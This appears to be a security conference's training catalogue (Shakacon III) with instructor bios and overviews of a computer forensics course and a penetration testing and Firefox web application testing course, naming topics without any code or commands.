Jason graduated from Cornell University in 2004 with a Bachelor of Science in Computer Science. He spent the summer of 2003 with Compuware Corporation, where he performed full source code recovery on malware samples and penetration-tested in-house copy-protection systems via reverse engineering. During the summer of 2002, Jason worked for Pitney Bowes, where he reverse engineered software security solutions and developed process-stealthing technologies.
Jason holds several patents in the fields of reverse engineering and network security. He is a Program Committee member of the Reverse Engineering Conference (REcon) and a Program Committee member of the International Conference on Malicious and Unwanted Software, is a regular trainer at Black Hat and other industry conferences, is often credited in industry talks and publications, and has been actively reverse engineering and analyzing software protection methods since 1995.
Computer Forensics (3 day) Overview:
Electronic evidence can be collected from a variety of sources. Within an organization’s network, evidence will be found in any form of technology that can be used to transmit or store data. This course was specifically designed for Shakacon III and is based on Secure DNA’s own HELIX Forensic Reference Model.
First, we give you an in-depth overview of the legal and evidence gathering processes that you should be adhering to, covering why you should establish guidelines for your organization, what team member roles should be established and when you should be using forensic techniques. Next, a practical application of open-source tools will show you the essential information that should be captured from a live network analysis. We’ll cover various file systems and how they store their data, showing you numerous artifacts that can be gathered and that are beneficial to your investigation. Finally, we’ll cover how to preserve the evidence so that you can archive it and further analyze the data offline.
All audiences will gain legal knowledge from this course and the hands-on practical exercises are tailored at an intermediate level to allow for a variety of individuals to benefit from the course material. Students are required to provide a laptop computer for their personal use.
Ryan Wentzel's Bio:
Ryan Wentzel is currently a Senior Consultant within the Secure DNA Consulting Practice. Prior to Secure DNA, he was a law enforcement officer cross-designated as a federal agent assigned to a Hi-Tech Crimes Task Force, where he investigated hundreds of technology related cases and provided expert courtroom testimony on numerous occasions. He has specialized expertise in Computer Forensics and E-Discovery and is currently Hawaii’s only publicly documented EnCase Certified Examiner. Ryan has given numerous presentations on various technology topics and recently founded Secure DNA’s Forensic Training Division, which provides computer forensic training to local individuals and organizations.
Crash Course on Penetration Testing & Web Application Security Testing with Firefox (2 day) Overview:
Day 1 - Crash Course in Penetration Testing
This course will cover some of the newer aspects of penetration testing such as Open Source Intelligence Gathering with Maltego and other Open Source tools.
Advanced Scanning, Enumeration, Exploitation (remote and client-side), and Post-Exploitation relying heavily on the features included in the Metasploit Framework will also be covered.
Emphasis throughout the entire workshop will be placed on being as stealthy as possible, and dealing with popular defensive technologies such as:
- Network Intrusion Detection/Prevention Systems
- Host-Based Intrusion Detection/Prevention Systems
- Web Application Firewalls
- Anti-Virus
- Content-Filtering Proxies
Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.
Day 2 - Web Application Penetration Testing with Firefox
There are a few commercial vulnerability scanners and penetration testing tools for the Web Application security space. There are even fewer open-source vulnerability scanners and penetration tools that serve this purpose. Firefox with its collection of security extensions and its relative ease of extension development is fast becoming a Web Application Penetration Testing platform of choice.
This workshop will focus on using Firefox as a Web Application Penetration Testing platform, developing Firefox extensions to automate common penetration testing tasks, and writing extensions to address issues that commercial tools don't.
Joe McCray's Bio:
Founder of LearnSecurityOnline.com and Assessment Practice Manager at Rapid7.